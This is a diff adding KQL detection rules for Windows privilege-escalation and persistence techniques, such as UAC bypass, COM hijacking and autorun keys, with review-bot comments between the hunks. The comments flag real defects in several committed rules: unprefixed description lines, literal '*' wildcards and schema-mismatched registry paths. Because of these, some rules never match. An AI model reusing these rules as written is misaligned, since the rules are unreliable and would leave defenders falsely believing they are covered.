diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql new file mode 100644 index 00000000..8d614901 --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql @@ -0,0 +1,12 @@ +// Title: Bypass UAC via CMSTP +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003 +// False Positives: +// - Legitimate use of cmstp.exe utility by legitimate user + +DeviceProcessEvents +| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql new file mode 100644 index 00000000..3ecc9937 --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Bypass UAC via WSReset.exe +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth +// Date: 2019-10-24 +// Level: high +// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 +// False Positives: +// - Unknown sub processes of Wsreset.exe + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql new file mode 100644 index 00000000..7382ef34 --- /dev/null +++ b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql 
@@ -0,0 +1,12 @@
+// Title: Change Default File Association To Executable Via Assoc
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects when a program changes the default file association of any extension to an executable.
+When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
new file mode 100644
index 00000000..b8ab39a8
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
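Review bot: The description continuation `+When a file is opened, the default program used to open the file ...` is written without the `// ` comment prefix, so the file contains a bare prose line ahead of the query and is not valid KQL as committed. The same unprefixed continuation lines appear in change_default_file_association_via_assoc.kql, changing_existing_service_imagepath_value_via_reg_exe.kql (two lines) and creation_exe_for_service_with_unquoted_path.kql, which suggests the converter prefixes only the first line of a multi-line Sigma description. Each continuation line should start with `// `, e.g. `// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. ...`, and the converter should prefix every description line so this does not recur on the next regeneration.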
@@ -0,0 +1,14 @@
+// Title: Change Default File Association Via Assoc
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects file association changes using the builtin "assoc" command.
+When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+// False Positives:
+// - Admin activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
new file mode 100644
index 00000000..84d3564d
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
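Review bot: `ProcessCommandLine contains "assoc"` is a substring test, so any cmd.exe command line that carries those letters inside a longer word or path (an `associated` flag, a `\Associates\` folder) is flagged, not only invocations of the built-in. A term match keeps the real uses and drops those: `| where ProcessCommandLine has "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")`. The sibling rule in the previous hunk already narrows with `contains "assoc "` (trailing space); this one should be at least as tight, since the header lists admin activity as the only expected false positive.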
@@ -0,0 +1,13 @@
+// Title: Changing Existing Service ImagePath Value Via Reg.EXE
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
+Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
+Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d " or ProcessCommandLine contains " –d " or ProcessCommandLine contains " —d " or ProcessCommandLine contains " ―d ")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql
new file mode 100644
index 00000000..6cf0b25b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql
@@ -0,0 +1,13 @@ +// Title: Classes Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey endswith 
"\\lnkfile\\shellex\\ContextMenuHandlers*")))) and (not(RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql new file mode 100644 index 00000000..1cebb162 --- /dev/null +++ b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql @@ -0,0 +1,12 @@ +// Title: COM Hijacking via TreatAs +// Author: frack113 +// Date: 2022-08-28 +// Level: medium +// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use + +DeviceRegistryEvents +| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql new file mode 100644 index 00000000..24b51adb --- /dev/null +++ b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql 
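Review bot: The trailing `*` in `RegistryKey endswith "\\lnkfile\\shellex\\ContextMenuHandlers*"` is a literal character in KQL — `endswith` has no glob support — so the svchost exclusion in this hunk only matches a key that really ends in an asterisk and never applies. The same converted wildcard appears in com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql, where three `endswith` terms on the same RegistryKey are ANDed so no row can satisfy the selection, in the `\\PROTOCOLS\\Handler*` exclusions of common_autorun_keys_modification.kql, and in currentversion_autorun_keys_modification.kql, where `RegistryKey endswith "\\Run*"`, `"\\RunOnce*"`, `"\\RunOnceEx*"`, `"\\RunServices*"` and `"\\RunServicesOnce*"` sit in the main selection and so the Run/RunOnce family the rule is named for is never selected; currentversion_nt_autorun_keys_modification.kql shows the same pattern but its hunk runs past this view. A Sigma value with a trailing wildcard should become a substring or regex test, e.g. `RegistryKey contains "\\CurrentVersion\\Run"` or `RegistryKey matches regex @"\\Run[^\\]*$"`, and the fix belongs in the converter's wildcard handling rather than in each rule.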
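Review bot: `RegistryKey endswith "TreatAs\\(Default)"` carries the Sysmon TargetObject convention of appending the value name to the key path, but in DeviceRegistryEvents the key path and the value name are separate columns (RegistryKey and RegistryValueName), so this selection — the rule's only positive condition — is unlikely to ever match. The same `\\(Default)` suffix is the whole selection in com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql (`\\InprocServer32\\(Default)`, `\\LocalServer32\\(Default)`) and one of the ORed terms in classes_autorun_keys_modification.kql and common_autorun_keys_modification.kql, and the `RegistryValueData =~ "(Empty)"` and `"Binary Data"` filters in the autorun rules rest on Sysmon's Details formatting in the same way. A schema-correct form would be `| where RegistryKey endswith "\\TreatAs" and isempty(RegistryValueName)`, assuming the default value is reported with an empty RegistryValueName — worth confirming against live DeviceRegistryEvents rows before relying on it.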
@@ -0,0 +1,12 @@ +// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-16 +// Level: high +// Description: Detects potential COM object hijacking via modification of default system CLSID. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey endswith "\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}*" or RegistryKey endswith "\\{2155fee3-2419-4373-b102-6843707eb41f}*" or RegistryKey endswith "\\{4590f811-1d3a-11d0-891f-00aa004b2e24}*" or RegistryKey endswith "\\{4de225bf-cf59-4cfc-85f7-68b90f185355}*" or RegistryKey endswith "\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}*" or RegistryKey endswith "\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}*" or RegistryKey endswith "\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}*" or RegistryKey endswith "\\{7849596a-48ea-486e-8937-a2a3009f31a9}*" or RegistryKey endswith "\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}*" or RegistryKey endswith "\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}*" or RegistryKey endswith "\\{30D49246-D217-465F-B00B-AC9DDD652EB7}*" or RegistryKey endswith "\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}*" or RegistryKey endswith "\\{2227A280-3AEA-1069-A2DE-08002B30309D}*" or RegistryKey endswith "\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}*" or RegistryKey endswith "\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}*") and (RegistryKey endswith "\\CLSID*" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)"))) and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or 
RegistryValueData contains "\\Temporary Internet" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql new file mode 100644 index 00000000..39c14ca1 --- /dev/null +++ b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@ +// Title: Common Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or 
RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler*" or RegistryKey endswith "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler*") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/control_panel_items.kql b/KQL/rules/Privilege Escalation/control_panel_items.kql new file mode 100644 index 00000000..73d6ffb7 --- /dev/null +++ b/KQL/rules/Privilege Escalation/control_panel_items.kql 
@@ -0,0 +1,10 @@
+// Title: Control Panel Items
+// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-06-22
+// Level: high
+// Description: Detects the malicious use of a control panel item
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql
new file mode 100644
index 00000000..de77d3a8
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql
@@ -0,0 +1,10 @@
+// Title: Created Files by Microsoft Sync Center
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
new file mode 100644
index 00000000..01284022
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
@@ -0,0 +1,12 @@
+// Title: Creation Exe for Service with Unquoted Path
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
+Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\program.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
new file mode 100644
index 00000000..6d865550
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
@@ -0,0 +1,10 @@
+// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder
+// Author: frack113
+// Date: 2022-05-09
+// Level: medium
+// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql
new file mode 100644
index 00000000..421bf996
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql
@@ -0,0 +1,13 @@ +// Title: CurrentControlSet Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or 
(RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql new file mode 100644 index 00000000..78b4aadd --- /dev/null +++ b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@ +// Title: CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not(((RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or 
InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey endswith "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}*" or RegistryKey endswith "\\Authentication\\Credential 
